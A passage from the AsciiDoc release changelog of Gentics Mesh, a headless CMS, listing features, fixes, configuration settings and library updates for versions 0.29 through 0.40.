so that the resulting destination format fits inside the provided dimensions (`width`, `height`). No distortion of the image will occur.\n\nFor details on image manipulation and resizing opions read the link:{{< relref \"image-manipulation.asciidoc\" >}}[Image Manipulation documentation].\n\nThis change might not automatically apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be manually cleared.\n\n____\n\nicon:plus[] Search: A new search option `search.mappingMode` has been added. The mapping mode setting influences how mappings for fields will be generated. By default the mode `DYNAMIC` is used. In this mode mappings are generated as before. When using the mode `STRICT` only mappings for fields which have a custom mapping via the `elasticsearch` schema parameter will be created. This is useful if you want to have finer control of what contents should be added to Elasticsearch.\n\nicon:plus[] Graph: The default value for `tx.retry.delay` has been set to 0. The tx delay will thus be disabled by default.\n\nicon:plus[] Clustering: The `storage.synchronizeWrites` option will be enabled by default when clustering is active.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.23\n\n[[v0.39.2]]\n== 0.39.2 (20.08.2019)\n\nicon:check[] A regression in `v0.38.0` caused migration errors for nodes which contained not yet populated fields. This issue has now been fixed. Failed migrations can be re-run by deleting the failed job via `DELETE \/api\/v2\/admin\/jobs\/{jobUuid}` and triggering `POST \/api\/v2\/{project}\/branches\/{branchUuid}\/migrateSchemas` to create a new migration job. link:https:\/\/github.com\/gentics\/mesh\/issues\/847[#847]\n\nicon:plus[] Graph: It is now possible to configure the OrientDB transaction delay by adding the `tx.retry.delay` parameter to the the `storage.parameters` field.\n\n[[v0.39.1]]\n== 0.39.1 (14.08.2019)\n\nicon:check[] A regression in `v0.39.0` broke the `\/demo` endpoint. This has been fixed now and the demo application is accessible again.\n\n[[v0.39.0]]\n== 0.39.0 (13.08.2019)\n\nicon:plus[] Core: The core has been reworked to add future support for multitenancy in Gentics Mesh.\n\n[[v0.38.1]]\n== 0.38.1 (12.08.2019)\n\nicon:check[] Plugins: A bug in the plugin startup process has been fixed. Previously plugins were not initialized prior to registration.\n\nicon:check[] GraphQL: The `pluginApi` field will no longer be added to the schema if no GraphQL plugins have been deployed to avoid schema validation errors. link:https:\/\/github.com\/gentics\/mesh\/issues\/842[#842]\n\nicon:plus[] Changelog: The `ReleaseBranchRenameChange` entry has been updated to reduce required memory and increase execution performance on large databases (2m+ nodes).\n\nicon:plus[] REST: A `X-Powered-By` header was added to all http responses.\n\n[[v0.38.0]]\n== 0.38.0 (09.08.2019)\n\nCAUTION: Removal of mapper script support\n\n[quote]\n____\n\nThe mapper script support has been dropped due to the deprecation of the Nashorn JavaScript engine. The functionality of mapper scripts can be replaced by usage of the new link:{{< relref \"plugin-types\/auth-service-plugin.asciidoc\" >}}[Authentication Service Plugin API].\n\nThe `auth.mapperScriptDevMode` and `auth.mapperScriptPath` configuration options are no longer needed and have been removed.\n____\n\nicon:check[]: Plugins: The query type of plugins will now automatically be prefixed with the plugin apiName to ensure that no type conflicts can occur.\n\n[[v0.37.1]]\n== 0.37.1 (06.08.2019)\n\nicon:plus[] Core: The core Dagger library was updated from version `2.11` to `2.24`.\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\n[[v0.37.0]]\n== 0.37.0 (05.08.2019)\n\nicon:bullhorn[] New Plugin System\n\n[quote]\n____\n\nThe Plugin System has been overhauled.\n\n*REST API changes*\n\nPreviously plugins were assigned a UUID and could thus be managed using this uuid:\n\n* `DELETE \/admin\/plugins\/{uuid}`\n\nThe new plugin system will now utilize the plugin id for these REST and GraphQL API instead. The pluginId is unique to each plugin and a better and easier to grasp identifier for a plugin.\n\n*New Java API \/ Structure*\n\nThe plugin API and structure has been overhauled and existing plugins need to be migrated (link:{{< relref \"plugin-migration.asciidoc\" >}}[Migration Guide]) to the new API in order to be deployable.\n\n*GraphQL Plugin support*\n\nIt is now possible to create plugins which extend the GraphQL API. Plugins which provide link:{{< relref \"plugin-development.asciidoc\" >}}#_graphql_plugin[GraphQL extensions] will be made accessible under the `pluginApi` GraphQL field.\n\n*Dropped maven repository support*\n\nIt is no longer possible to load plugins directly via Maven Coordinates. The REST API will only accept a filesystem paths to plugins.\n\n*Classloader fix*\n\nThe classloader mechanism has been altered. Plugins can now provide their own library versions. Previously a class which was also present in Gentics Mesh Server was loaded from the server class loader instead of the plugin. This has been fixed now.\n\n*Examples \/ Guide*\n\nThe plugin development process documentation has been enhanced.\n\n* link:{{< relref \"plugin-development\" >}}[Plugin Development]\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples[Plugin Examples]\n* link:{{< relref \"guides\/mesh-library-plugin\" >}}[Example Plugin Guide]\n\n____\n\nicon:check[] Core: Fixed a bug that caused an error when changing a field in a schema to a binary field.\n\nicon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.0`.\n\n[[v0.36.8]]\n== 0.36.8 (02.08.2019)\n\nicon:check[] Core: Fixed a bug that caused node contents to not be found when migrating from an old version of Gentics Mesh (0.22.x) to the current version.\n\n[[v0.36.7]]\n== 0.36.7 (23.07.2019)\n\nicon:check[] Backup: Fixed a bug in the backup handler which prevented the backup process to switch back to the correct status after a backup failed due to filesystem errors.\n\nicon:plus[] Java Rest Client: Added `#equals` and `#hashCode` implementations to REST models.\n\nicon:plus[] Graph: It is now possible to configure the OrientDB `RID_BAG_EMBEDDED_TO_SBTREEBONSAI_THRESHOLD` setting by adding the `ridBag.embeddedToSbtreeBonsaiThreshold` parameter to the the `storage.parameters` field.\n\nicon:plus[] REST: An error will now be returned when sending the `newPassword` field in the login request when the `forcedPasswordChange` flag has not been set.\n\nicon:plus[] REST: The webroot responses will now contain the header `Webroot-Node-Uuid` which identifies the node of the loaded content.\n\nicon:plus[] REST: The authentication and element loading performance has been greatly increased.\n\n[[v0.36.6]]\n== 0.36.6 (16.07.2019)\n\nicon:plus[] REST: The performance of path resolving has been improved.\n\nicon:plus[] Core: A new configuration section has been added. The `cache` options in the `mesh.yml` can now be used to control cache settings. The `cache.pathCacheSize` config setting and `MESH_CACHE_PATH_SIZE` environment variable can be used to control the path cache which will improve webroot and GraphQL path resolving performance.\n\nicon:plus[] REST: The `webroot` endpoint will now set the `Cache-Control` header to `public` if the requested node can be read using the anonymous role. Otherwise the header will be set to `private`. This information is useful if you want to use a Caching Proxy in-between Gentics Mesh and your front-end application.\n\nicon:check[] Core: Performance of loading nodes has been improved.\n\nicon:check[] Core: Request logging now uses the link:https:\/\/vertx.io\/docs\/apidocs\/io\/vertx\/ext\/web\/handler\/LoggerFormat.html#SHORT[short format], which also shows how much time the the response took to complete.\n\nicon:check[] Core: Improved performance when loading images with image manipulation.\n\n[[v0.36.5]]\n== 0.36.5 (10.07.2019)\n\nicon:plus[] Upload: The `upload.parser` config setting and `MESH_BINARY_DOCUMENT_PARSER` environment variable can be used to control whether uploads should be parsed to extract metadata and contents. Uploads will be parsed by default.\n\nicon:plus[] Search: The `search.includeBinaryFields` config setting and `MESH_ELASTICSEARCH_INCLUDE_BINARY_FIELDS` environment variable can be used to control whether binary field metadata and plain text content should be added to the search index. By default metadata and content will be added to the search index.\n\nicon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] GraphQL: The performance when loading nodes via the schema field has been improved.\n\nicon:plus[] Core: Various internal calls have been improved to increase read performance.\n\nicon:check[] Search: Fixed root cause of unnecessary full sync which could occur during schema migrations.\n\n[[v0.36.4]]\n== 0.36.4 (05.07.2019)\n\nicon:check[] GraphQL: Fixed a bug that caused an error when filtering a node from a schema context that has no content in the default language.\n\nicon:plus[] Graph: The `storage.synchronizeWrites` config setting and `MESH_GRAPH_SYNC_WRITES` environment variable can be used to control whether write operations should be executed synchronously. By default write operations are handled asynchronously.\n\nicon:check[] Core: Performance of schema migration has been improved.\n\n[[v0.36.3]]\n== 0.36.3 (04.07.2019)\n\nicon:plus[] Search: Two new options have been added to the mesh search configuration. When the encoded request length exceeds the new `bulkLengthLimit`, no new documents will be added to the bulk and the bulk will be sent to Elasticsearch. The new `retryLimit` causes Gentics Mesh to drop a request to Elasticsearch after the configured limit has been reached. link:https:\/\/github.com\/gentics\/mesh\/issues\/784[#784]\n\nicon:check[] Search: Backpressure for handling index requests has been improved. This reduces memory usage when indexing large amounts of data in a short period of time. link:https:\/\/github.com\/gentics\/mesh\/issues\/785[#785]\n\nicon:check[] Search: Some default configuration values have been changed. `timeout`: `8000` -> `60000`, `bulkLimit`: `2000` -> `100`. These changes will not be applied to existing configurations.\n\nicon:check[] REST: Various branch specific internal checks have been updated to fix potential error cases. link:https:\/\/github.com\/gentics\/mesh\/issues\/787[#787]\n\nicon:check[] Logging: The default logging configuration now includes the Java class for each log message.\n\n[[v0.36.2]]\n== 0.36.2 (02.07.2019)\n\nicon:check[] Search: Encoding issues which happen on systems which were not using `UTF-8` as default locale have been fixed by updating the underlying Elasticsearch client. link:https:\/\/github.com\/gentics\/mesh\/issues\/498[498]\n\nicon:plus[] Search: It is now possible to use encrypted and authenticated connections between Gentics Mesh and Elasticsearch. New settings and environment variables have been added. Details can be found in the link:{{< relref \"elasticsearch.asciidoc\" >}}#_security[Elasticsearch documentation] link:https:\/\/github.com\/gentics\/mesh\/issues\/759[#759]\n\nicon:plus[] Security: The 'spring-security' library has been updated.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.21\n\nicon:plus[] GraphQL: You can now track ingoing node references. See the link:{{< relref \"graphql.asciidoc\" >}}#_loading_ingoing_references[example] in the documentation.\n\nicon:check[] Search: Fixed a bug that caused configured timeouts to not be applied correctly.\n\n[[v0.36.1]]\n== 0.36.1 (18.06.2019)\n\nicon:plus[] Core: Support for Java 11 runtime has been added.\n\nicon:plus[] Docker: The base image of the `gentics\/mesh` and `gentics\/mesh-demo` images have been updated to use the `adoptopenjdk\/openjdk11:x86_64-alpine-jre-11.0.3_7` image.\n\nicon:plus[] Docker: The included Elasticsearch version has been updated to version 6.8.0. Please note that support for embedded Elasticsearch will be dropped in the future.\n\nicon:check[] REST: The deletion of microschemas which contain changes has been fixed. Previously a `NotImplementedException` was thrown for microschemas which contained changes. link:https:\/\/github.com\/gentics\/mesh\/issues\/589[#589]\n\nicon:check[] REST: Error messages should now always be wrapped in JSON. Previously, internal server errors were returned as plain text.\n\nicon:check[] GraphQL: Fixed a bug that caused the default language of a node to be fetched when loading a node list of a micronode.\n\nicon:plus[] Core: Various internal structures and dependencies were re-organized and refactored.\n\nicon:plus[] UI: The default set of enabled languages within the `mesh-ui-config.js` file has been updated to include more languages.\n\n[[v0.36.0]]\n== 0.36.0 (12.06.2019)\n\nCAUTION: Java Rest Client\n\n[quote]\n____\n\nThe default field values for `NodeResponse` and `AbstractGenericRestResponse` has been updated.\n\nThe following values have been changed:\n\n* `AbstractGenericRestResponse#permissions`\n* `NodeResponse#tags`\n* `NodeResponse#childrenInfo`\n* `NodeResponse#container`\n* `NodeResponse#fields`\n* `NodeResponse#breadcrumb`\n\nThe `NodeResponse#isContainer` method has been deprecated and was replaced by `NodeResponse#getContainer`\n\nApplications which use affected models will most likely not need to updated since the returned response will always set the affected fields.\n____\n\nicon:plus[] REST: The `?fields` query parameter which can be used to filter response properties will now work more granularly on node responses.\n\nCAUTION: Custom node migration scripts have been removed.\n\n[quote]\n____\n\nThe script system was a source of possible errors and performance problems. Also, the nashorn javascript engine has been deprecated with the release of Java 11. If you need to change data for a migration, use the REST Api instead.\n____\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be sent to the client when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\nicon:plus[] REST: Error messages now contain the property `i18nKey`. This allows for easy identification of different errors.\n\n[[v0.35.0]]\n== 0.35.0 (06.06.2019)\n\nCAUTION: Rest Model: The `BranchResponse#isMigrated` method has been changed to `BranchResponse#getMigrated`.\n\nNOTE: Fetching fields of a node\/micronode in GraphQL requires a different query in `\/api\/v2`. Please refer to the link:https:\/\/github.com\/gentics\/mesh\/issues\/428[#428] and link:https:\/\/github.com\/gentics\/mesh\/issues\/317[#317] for details.\n\nicon:check[] Backup: Fixed `NullPointerException` which occurred when the backup directory was missing and the backup endpoint was invoked. link:https:\/\/github.com\/gentics\/mesh\/issues\/463[#463]\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.7.1`.\n\nicon:check[] Focal point: It is now possible to use the `{apiLatest}\/:projectName\/nodes\/:uuid\/binaryTransform\/:fieldName` to resize and image and set the focal point in one operation.\n\nicon:check[] The `Content-Disposition` header will now contain the UTF-8 and ISO-8859-1 encoded filename. link:https:\/\/github.com\/gentics\/mesh\/issues\/702[#702]\n\nicon:plus[] REST: It is now possible to set a flag that forces a user to change their password on the next login. Take a look at link:{{< relref \"authentication.asciidoc\" >}}#_forcing_user_to_change_password[the documentation] for more information.\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be responded when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\n[[v0.34.0]]\n== 0.34.0 (28.05.2019)\n\nicon:bullhorn[] Versioning Enhancements\n\n[quote]\n____\n\nThe versioning system has received various enhancements.\n\nlink:{{< relref \"features.asciidoc\" >}}#auto-purge[Auto Purge]\n\nThe auto purge feature will now automatically purge the previously no longer needed version of a content. You can control this behaviour using the `autoPurge` flag in the `mesh.yml` file.\n\nAdditionally schema's may now contain a `autoPurge` flag to override the setting on a per schema basis.\n\nThe documentation contains detailed information about how versioning can be controlled.\n\nlink:{{< relref \"features.asciidoc\" >}}#_listing_versions[Listing Versions]\n\nVersions of a node can now be listed via REST and GraphQL.\n\nlink:{{< relref \"features.asciidoc\" >}}#_purging_versions[Purging Versions]\n\nVersions can now be purged across projects to reduce disk storage usage.\n____\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\nicon:check[] Upload: The document processing library _tika_ has been updated to version `1.21` to fix potential out of memory issues during upload document processing.\n\nicon:check[] Branch Migration: A bug in the branch migration process has been fixed. Previously the wrong version of the content was used as branch root version. The process will now utilize the published version if one exists and otherwise use the draft version. This fix only affected internal data handling.\n\n[[v0.33.1]]\n== 0.33.1 (23.05.2019)\n\nicon:check[] Core: The dependency _hazelcast-kubernetes_ has set to version 1.2.2 to fix a compatibility issue with the used hazelcast version.\n\n[[v0.33.0]]\n== 0.33.0 (20.05.2019)\n\nicon:bullhorn[] Elasticsearch document handling\n\n[quote]\n____\n\nThe support for the Elasticsearch ingest plugin has been removed. The same functionality has been replaced with a much more efficient implementation which extracts the plain text of a document during upload processing. The structure of the generated search index has not changed and thus no modifications on existing search queries is required.\n\nThe plain text will now also be included in the REST and GraphQL response of binary fields.\n\nAn automatic changelog entry has been added which will parse all uploaded documents and extract the plain text. The duration of the execution of this task depends on the amount of documents that need to be parsed.\n\nThe new __mesh.yml__ setting `upload.parserLimit` can be used to control the document parser. See link:{{< relref \"features.asciidoc\" >}}#_text_extraction[Text extraction documentation] for more information.\n____\n\nicon:plus[] Search: The embedded elastichead interface has been removed. It is recommended to use browser extentions like link:https:\/\/chrome.google.com\/webstore\/detail\/elasticsearch-head\/ffmkiejjmecolpfloofpjologoblkegm[ElasticSearch Head for Chrome] instead.\n\nicon:check[] Core: Various internal libraries have been updated (logback, hazelcast-kubernetes, tika)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.19\n\n[[v0.32.0]]\n== 0.32.0 (08.05.2019)\n\nicon:bullhorn[] Event Handling\n\n[quote]\n____\n\nThe event handling mechanism has been completely overhauled.\n\n*Changes*\n\n* Additional events have been added\n* Event payload includes more information\n* Java Models for events have been added\n\n*API*\n\nThe API class `com.gentics.mesh.MeshEvent` was replaced by `com.gentics.mesh.core.rest.MeshEvent`.\n\nA detailed description of this feature can be found in our link:{{< relref \"events.asciidoc\" >}}[Event Documentation].\n____\n\nicon:bullhorn[] Elasticsearch Handling\n\n[quote]\n____\n\nThe Elasticsearch integration has been overhauled.\n\n*Integration*\n\nElasticsearch synchronization operations have been decoupled from regular write operations.\n\nThis has two main effects. First, regular write operations (e.g. Node Update, Node Create) will not block until the changed data has been synchronized with elasticsearch. This will result in higher overall write performance. Secondly, changes will not be directly visible in Elasticsearch since write operations in Elasticsearch have been decoupled and will be executed asynchronously after a element in Gentics Mesh has been modified. Implementations which highly rely on Gentics Mesh being in sync with ES for each operation may need to be adapted. When using the `\/search` or `\/rawSearch` endpoints in mesh, you can now provide the `?wait=true` query parameter. See details link:{{< relref \"elasticsearch.asciidoc\" >}}#endpoints[here]\n\n*Fixes*\n\nVarious issues with the previous Elasticsearch synchronization mechanism have been addressed.\n\n* Deletion of nodes will now also update documents in the index which reference the deleted node\n* Tag and Tag Family deletion will now correctly update referenced tags, tag families and nodes\n\n*Startup*\n\nGentics Mesh will no longer wait for Elasticsearch during start-up.\n\n*Resilience*\n\nThe resilience for Elasticsearch server issues has been improved. Failed requests will automatically be retried. If too many issues occur Gentics Mesh will automatically invoke an index sync in order to recover from the issue. This sync will be retried until Elasticsearch becomes responsive again.\n\n*Syncing*\n\nThe clear and sync mechanism has been streamlined in order to benefit from other changes like resilience.\n\n____\n\nNOTE: It is not required to reindex documents since the index names and structure has not been changed.\n\nicon:check[] File Handling: The file upload mechanism has been overhauled to address issues with blocked uploads which could occur when uploading multiple files in-parallel.\n\nicon:check[] File Handling: Failed Uploads will now remove temporary files from disk. Previously in some error situations the temporary upload have not been removed.\n\nicon:check[] Permissions: Applying permissions recursively on projects did not affect branches. This has been fixed.\n\nicon:plus[] Permissions: Setting permissions recursively is now done more efficiently.\n\nicon:plus[] Thread Usage: The overall request handling has been refactored to reduce situations in which the event-loop threads could be blocked. The request handling code has been unified.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.7.0\n\nicon:plus[] Performance: The overall read performance has been improved. The memory usage has been reduced.\n\n[[v0.31.6]]\n== 0.31.6 (27.05.2018)\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\n[[v0.31.5]]\n== 0.31.5 (07.05.2019)\n\nicon:check[] REST: The `publish` and `readPublished` permissions are now only shown for nodes.\n\nicon:check[] Core: Creation of schemas with the same name of an existing microschema or vice versa is not allowed anymore. Doing so caused conflicts in GraphQL. link:https:\/\/github.com\/gentics\/mesh\/issues\/597[#597]\n\nicon:check[] Core: A bug in the image transform endpoint has been fixed. Previously nodes which were updated using that endpoint could not be found via webroot anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/599[#599]\n\nicon:plus[] Job: The endpoint `POST {apiLatest}\/admin\/jobs\/:jobUuid\/process` has been added. It can be used to trigger job processing. The endpoint will also automatically reset a failed job to be queued again. The endpoints `DELETE {apiLatest}\/admin\/jobs\/:jobUuid\/error` and `POST {apiLatest}\/admin\/processJobs` will be removed in a future release. link:https:\/\/github.com\/gentics\/mesh\/issues\/171[#171]\n\nicon:check[] Plugins: A `NullPointerException` has been fixed which has happened when accessing `rc.user().principal()` within a plugin. link:https:\/\/github.com\/gentics\/mesh\/issues\/516[#516]\n\nicon:check[] REST: Creating a schema with a micronode field and the allow option set to `[]` will now allow micronodes of all microschemas. link:https:\/\/github.com\/gentics\/mesh\/issues\/431[#431]\n\nicon:check[] Core: Fixed a bug that caused an internal server error when applying changes to a microschema. link:https:\/\/github.com\/gentics\/mesh\/issues\/591[#591]\n\nicon:check[] UI: Fixed validation issues in microschema lists when updating nodes. Previously validation issues would not be detected by the UI and the node update would fail. link:https:\/\/github.com\/gentics\/mesh-ui\/pull\/202[#202]\n\n[[v0.31.4]]\n== 0.31.4 (11.04.2019)\n\nicon:check[] Schema: The `container` flag in the schema update request is now optional. Omitting the value will no longer cause Gentics Mesh to use the default value `false`. Subsequently the java request model was altered. The `Schema#isContainer` method was replaced with `Schema#getContainer`. Older REST client versions which by default always specified the container flag are still compatible with this change. link:https:\/\/github.com\/gentics\/mesh\/issues\/165[#165]\n\nicon:check[] GraphQL: The permission check for the `nodes` field of the type `Tag` has been fixed. Previously loading tagged nodes for a tag did not return the expected result. The `published` permission for published nodes was not checked correctly. This has been fixed now.\n\nicon:plus[] Logging: The default `logback.xml` file has been updated to include automatic scan of the logging configuration. This change will not be applied to existing configurations.\n\nicon:check[] Schema: It is now possible to reset the `allow` property of string fields. Setting the `allow` to empty array will now no longer restrict the values. Instead it will revert back to the original behaviour and allow all values.\n\nicon:check[] UI: Fixed a bug that caused the node list to jump to the first page on various actions. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/195[#195]\n\n[[v0.31.3]]\n== 0.31.3 (28.03.2019)\n\nicon:plus[] Logging: The conflict error logging has been improved. Conflict error information in the log will now be more detailed and also include the conflicting field key and versions.\n\nicon:check[] Permissions: A bug in the GraphQL `nodes` field was fixed. Previously branches were not correctly handled and too many nodes would be returned. Additionally the field would not correctly handle the read published permission and also return draft nodes to which no read permission was granted.\n\n[[v0.31.2.1]]\n== 0.31.2.1 (23.08.2019)\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\nicon:check[] REST: Fixed a bug which prevented the `DELETE \/api\/v1\/admin\/jobs\/:jobUuid\/error` from resetting the job.\n\n[[v0.31.2]]\n== 0.31.2 (22.03.2019)\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were updated. The `-Dstorage.diskCache.bufferSize=256` setting has been added for the server image. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information and recommendations.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.18.\n\nicon:check[] REST: The `GET {apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary\/:fieldName` endpoint will now always include the `accept-ranges: bytes` header to indicate to the client that it supports range requests. link:https:\/\/github.com\/gentics\/mesh\/issues\/643[#643]\n\nicon:check[] Configuration: The elasticsearch bulk limit can now be configured using the `MESH_ELASTICSEARCH_BULK_LIMIT` environment variable.\n\nicon:check[] Permissions: A bug in the GraphQL permission handling has been fixed. Previously nodes which had only read published permission assigned to them were not returned using the `nodes` field.\n\nicon:check[] Permissions: A bug in the permission handling of the nav root endpoint has been fixed. Previously nodes which had only read published permission assigned to them were not included in the navigation response.\n\n[[v0.31.1]]\n== 0.31.1 (18.03.2019)\n\nicon:plus[] GraphDB Import\/Export: The endpoints `POST {apiLatest}\/admin\/graphdb\/export` and `POST {apiLatest}\/admin\/graphdb\/import` have been added.\n\n[[v0.31.0]]\n== 0.31.0 (13.03.2019)\n\nicon:bullhorn[] Monitoring\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Monitoring feature__.\n\nThe Gentics Mesh server will now *additionally* to port `8080` also bind to port `8081` in order to provide the new monitoring API. New configuration settings have been added to allow configuration of this server.\n\nNOTE: The monitoring API should not be exposed publicly and will by default only bind to `localhost`.\n\nA detailed description of this feature can be found in our link:{{< relref \"monitoring.asciidoc\" >}}[Monitoring Documentation].\n____\n\nCAUTION: In a future release the following endpoints will be removed from the regular API (Port 8080) since they were moved to the new monitoring server API (Port 8081).\n\n* `GET {apiLatest}\/admin\/status` (Server Status)\n* `GET {apiLatest}\/admin\/cluster\/status` (Cluster Status)\n\nCAUTION: Because of a change in the image resizer, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Image: Quality of manipulated JPEG images can now be configured. The default value has been changed from `0.7` to `0.95`.\n\nicon:plus[] Image: The filter for resizing images can now be configured. The default filter is Lanczos.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.17.\n\nicon:plus[] REST: The `\/users` endpoint response will now contain a hash of a users roles.\n\nicon:plus[] GraphQL: The `roles` field is now available for user fields, and contains all roles of the respective user.\n\nicon:plus[] GraphQL: The `rolesHash` field is now available for user fields, and contains a hash of all the roles of the respective user. This field does not need any special permissions.\n\nicon:check[] Fixed a bug in the consistency checks which claimed missing user role shortcuts.\n\nicon:check[] Schema: A bug was fixed which prevented the update of the schema field `elasticsearch` property to value null.\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were added. Default for server is set to `-Xms512m -Xmx512m -XX:MaxDirectMemorySize=256m`. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information.\n\nicon:check[] The `.vertx` cache folder was moved to the configurable `data\/tmp` folder.\n\n[[v0.30.2]]\n== 0.30.2 (28.02.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.16 - This update addresses various locking and synchronization issues when clustering was enabled.\n\nicon:check[] Restore: The restore process has been reworked to avoid issues with graph database indices. Additional error handling has been added.\n\nicon:check[] Backup: Backup support for clustered mode has been added. The backup endpoint previously did not work as expected in clustered mode.\n\n[[v0.30.1]]\n== 0.30.1 (15.02.2019)\n\nicon:plus[] GraphQL: nodes can now be loaded via a list of UUIDs.\n\nicon:check[] Java Rest Client: Fixed a bug that occurred when calling `getResponse()` with `getBody()` on a binary response.\n\nicon:check[] Java Rest Client: Fixed a bug in the MeshRestClient#isOneOf helper function.\n\n[[v0.30.0]]\n== 0.30.0 (12.02.2019)\n\nCAUTION: Java Rest Client: The Gentics Mesh Java REST client which was based on Vert.x was replaced with a `OkHttpClient` implementation. Some changes to the client interface were necessary to make the client independent of Vert.x. See link:https:\/\/getmesh.io\/docs\/platforms\/#_java[this example] and the Javadoc for more information.\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\nicon:check[] Core: Fixed a bug that caused too long responses on binary range requests.\n\nicon:check[] GraphQL: Fixed a bug when loading a node via path. When the node itself did not exist, the query would return its parent node.\n\n[[v0.29.10]]\n== 0.29.10 (08.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during delete requests.\n\n[[v0.29.9]]\n== 0.29.9 (07.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during create\/update requests.\n\n[[v0.29.8]]\n== 0.29.8 (05.02.2019)\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\n[[v0.29.7]]\n== 0.29.7 (05.02.2019)\n\nicon:check[] Clustering: The default write `writeQuorum` has been set to `majority` to increase cluster stability. A `writeQuorum` of `1` can cause synchronization issues.\n\nicon:check[] Elasticsearch: The Elasticsearch synchronization verticle will no longer be deployed when no Elasticsearch has been configured.\n\n[[v0.29.6]]\n== 0.29.6 (01.02.2019)\n\nicon:plus[] Core: The way editor references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.\n\n[[v0.29.5]]\n== 0.29.5 (31.01.2019)\n\nicon:check[] Clustering: Creation of edges which lead to higher contention in the graph have been removed from job's. Job's will currently no longer reference the creator.\n\nicon:check[] Search: An error which was thrown by outdated branch schema assignments has been suppressed. A warning will be logged instead.\n\n\n[[v0.29.4]]\n== 0.29.4 (28.01.2019)\n\nicon:check[] Restore: A check has been added which will disable the restore operation while running in clustered mode.\n\nicon:check[] Demo: The demo has been fixed. Previously some of the demo files we were missing.\n\n[[v0.29.3]]\n== 0.29.3 (25.01.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.14\n\nicon:check[] Core: The job processing will no longer be invoked in an interval in order to reduce cluster operation contention. Instead the `{apiLatest}\/admin\/processJobs` endpoint can be used to manually trigger job processing.\n\nicon:check[] Core: Fixed a bug that caused nodes with a slash in their segment field to not be found via webroot.\n\nicon:check[] Restore: A `ClassCastException` has been fixed which could be observed directly after a backup restore operation.\n\nicon:check[] Changelog: The automatic backup of OrientDB configurations which was executed during the 0.29.0 update has been removed.\n\n[[v0.29.2]]\n== 0.29.2 (18.01.2019)\n\nicon:plus[] Changelog: The changelog execution performance has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:check[] Restore: An error will be returned when `{apiLatest}\/admin\/graphdb\/restore` is being invoked in clustered mode. Restoring the database is not possible in this mode.\n\nicon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never be finished. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.\n\nicon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\n[[v0.29.1]]\n== 0.29.1 (16.01.2019)\n\nCAUTION: Because of a change in the image cache, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Core: Performance of the deletion process has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which lists the count of repair operations.\n The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.\n\nicon:check[] Image: Resizing and cropping will no longer transform the image to JPG format but return an image in the original format. When no image writing plugin for this format is available the fallback is PNG.\n\nicon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.\n\n[[v0.29.0]]\n== 0.29.0 (14.01.2019)\n\nCAUTION: The embedded Graph Database was updated from version 2.2.37 to 3.0.13. See required changes below.\n\nicon:plus[] OrientDB 3.0.x: Existing `orientdb-server-config.xml`, `hazelcast.xml`, `default-distributed-db-config.json` configuration files will automatically be moved away and the new configuration files will be created 